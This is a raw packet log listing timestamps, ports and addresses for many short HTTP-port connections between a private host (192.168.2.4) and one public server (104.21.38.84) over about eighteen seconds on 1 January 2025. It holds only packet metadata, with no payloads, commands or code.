Jan 1, 2025 14:53:14.827157974 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.827754021 CET	80	49971	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:14.827924013 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.828062057 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.832916021 CET	80	49971	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.183478117 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.188396931 CET	80	49971	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.299839020 CET	80	49971	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.339647055 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.480200052 CET	80	49971	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.527280092 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.598299980 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.598886967 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.603359938 CET	80	49971	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.603604078 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.603688955 CET	80	49977	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.603754997 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.603885889 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.608680964 CET	80	49977	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:15.949100018 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:15.954056025 CET	80	49977	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.048059940 CET	80	49977	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.089667082 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.229343891 CET	80	49977	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.277159929 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.346750975 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.347246885 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.351799965 CET	80	49977	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.351892948 CET	49977	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.352123022 CET	80	49983	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.352184057 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.352289915 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.357038021 CET	80	49983	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.699131012 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.703957081 CET	80	49983	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.804708004 CET	80	49983	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.855284929 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.918648005 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.919039965 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.923660040 CET	80	49983	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.923718929 CET	49983	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.923928022 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:16.924134970 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.924282074 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:16.929075956 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.037596941 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.042738914 CET	80	49989	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.042813063 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.042898893 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.047739029 CET	80	49989	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.277270079 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.282123089 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.282229900 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.378056049 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.402266026 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.407094955 CET	80	49989	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.433413029 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.486720085 CET	80	49989	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.542912006 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.640228033 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.683479071 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.728766918 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.758821011 CET	80	49989	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.777304888 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.801592112 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.885205030 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.885339022 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.886013031 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.890430927 CET	80	49988	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.890489101 CET	49988	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.890791893 CET	80	49989	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.890851021 CET	49989	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.890933990 CET	80	49996	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:17.891000032 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.891175985 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:17.895936012 CET	80	49996	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:18.246124029 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:18.253693104 CET	80	49996	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:18.353971004 CET	80	49996	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:18.402267933 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:18.618941069 CET	80	49996	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:18.667819023 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:18.739536047 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:18.744393110 CET	80	50002	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:18.744472980 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:18.744623899 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:18.749448061 CET	80	50002	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.089760065 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.094616890 CET	80	50002	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.197865009 CET	80	50002	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.245929003 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.462896109 CET	80	50002	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.511606932 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.585315943 CET	49806	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.585480928 CET	49799	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.585481882 CET	49996	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.586229086 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.586952925 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.591279030 CET	80	50002	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.591326952 CET	50002	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.591785908 CET	80	50009	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.591850042 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.591994047 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.596781015 CET	80	50009	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:19.949393034 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:19.954272032 CET	80	50009	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.055293083 CET	80	50009	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.105338097 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.314991951 CET	80	50009	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.355334997 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.428673029 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.429393053 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.433708906 CET	80	50009	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.434215069 CET	80	50016	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.434289932 CET	50009	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.434319973 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.434406996 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.439171076 CET	80	50016	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.793019056 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:20.797894001 CET	80	50016	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.883064032 CET	80	50016	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:20.933486938 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.065653086 CET	80	50016	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.120968103 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.176136971 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.176733017 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.181238890 CET	80	50016	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.181586027 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.181663990 CET	50016	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.181704998 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.181802988 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.186634064 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.527460098 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.533258915 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.631953955 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.683449984 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.802687883 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.855489016 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:21.889344931 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:21.933448076 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.005388021 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.005999088 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.010344028 CET	80	50022	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.010416031 CET	50022	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.010855913 CET	80	50029	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.010978937 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.011080027 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.015958071 CET	80	50029	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.355564117 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.360452890 CET	80	50029	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.458761930 CET	80	50029	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.511674881 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.635010004 CET	80	50029	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.683469057 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.736337900 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.736933947 CET	50034	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.741400957 CET	80	50029	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.741455078 CET	50029	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.741811037 CET	80	50034	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.741873026 CET	50034	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.742400885 CET	50034	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.747219086 CET	80	50034	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.754527092 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.754587889 CET	50034	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.759391069 CET	80	50036	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.759457111 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.759742975 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:22.764627934 CET	80	50036	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:22.802031040 CET	80	50034	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.095310926 CET	80	50034	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.095432043 CET	50034	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.105408907 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.110228062 CET	80	50036	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.213421106 CET	80	50036	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.261581898 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.479727030 CET	80	50036	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.527205944 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.598062992 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.598659039 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.603130102 CET	80	50036	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.603216887 CET	50036	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.603485107 CET	80	50042	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.603549957 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.603698015 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.608521938 CET	80	50042	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:23.949152946 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:23.954061985 CET	80	50042	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.048075914 CET	80	50042	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.089709997 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:24.323241949 CET	80	50042	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.370963097 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:24.442123890 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:24.446995020 CET	80	50048	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.447093010 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:24.447185040 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:24.451973915 CET	80	50048	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.792975903 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:24.797945976 CET	80	50048	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.909769058 CET	80	50048	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:24.964709044 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.082488060 CET	80	50048	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.136610031 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.191802979 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.192416906 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.196891069 CET	80	50048	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.196963072 CET	50048	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.197247028 CET	80	50053	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.197308064 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.197386026 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.202178955 CET	80	50053	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.543051004 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.547980070 CET	80	50053	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.659749031 CET	80	50053	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.714735031 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.829822063 CET	80	50053	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.870965958 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.939379930 CET	50042	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.944390059 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.945049047 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.949418068 CET	80	50053	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.949480057 CET	50053	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.949883938 CET	80	50058	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:25.950066090 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.950170040 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:25.954999924 CET	80	50058	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:26.308656931 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.313560963 CET	80	50058	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:26.393954992 CET	80	50058	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:26.433585882 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.564632893 CET	80	50058	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:26.605351925 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.676403046 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.677011967 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.681437969 CET	80	50058	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:26.681503057 CET	50058	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.681870937 CET	80	50064	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:26.681937933 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.682040930 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:26.686855078 CET	80	50064	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.027513027 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.032471895 CET	80	50064	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.135472059 CET	80	50064	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.183466911 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.395225048 CET	80	50064	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.449136019 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.521444082 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.522036076 CET	50070	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.526593924 CET	80	50064	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.526911974 CET	80	50070	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.526978016 CET	50064	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.527008057 CET	50070	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.527115107 CET	50070	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.531970024 CET	80	50070	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.779228926 CET	50070	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.779309988 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.784176111 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.784822941 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.784956932 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.789828062 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.826028109 CET	80	50070	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.889569044 CET	80	50070	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.889626026 CET	50070	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.898375034 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.903239965 CET	80	50074	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:27.903301954 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.903424978 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:27.908283949 CET	80	50074	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.136714935 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.141642094 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.141737938 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.230123997 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.261713028 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.266701937 CET	80	50074	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.277239084 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.346236944 CET	80	50074	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.402345896 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.502389908 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.543087006 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.609782934 CET	80	50074	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.652232885 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.722860098 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.722873926 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.723526955 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.727982044 CET	80	50072	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.728035927 CET	50072	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.728316069 CET	80	50074	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.728368998 CET	50074	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.728444099 CET	80	50081	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:28.728512049 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.728593111 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:28.733419895 CET	80	50081	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:29.074196100 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.079346895 CET	80	50081	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:29.192742109 CET	80	50081	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:29.246030092 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.459642887 CET	80	50081	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:29.511629105 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.583647966 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.588591099 CET	80	50087	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:29.588660955 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.588741064 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.593548059 CET	80	50087	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:29.933598995 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:29.938515902 CET	80	50087	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.045011044 CET	80	50087	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.089750051 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.214221954 CET	80	50087	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.261626005 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.341866970 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.342638016 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.347157001 CET	80	50087	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.347209930 CET	50087	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.347498894 CET	80	50093	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.347559929 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.347722054 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.352581024 CET	80	50093	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.699337006 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:30.704269886 CET	80	50093	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.798696041 CET	80	50093	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:30.839870930 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.052902937 CET	80	50093	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.105483055 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.176826954 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.177400112 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.181853056 CET	80	50093	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.181910038 CET	50093	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.182255030 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.182312965 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.182378054 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.187431097 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.527422905 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.532345057 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.648525953 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.699121952 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:31.950557947 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:31.996018887 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.086225986 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:32.136653900 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.206723928 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.207218885 CET	50107	80	192.168.2.4	104.21.38.84
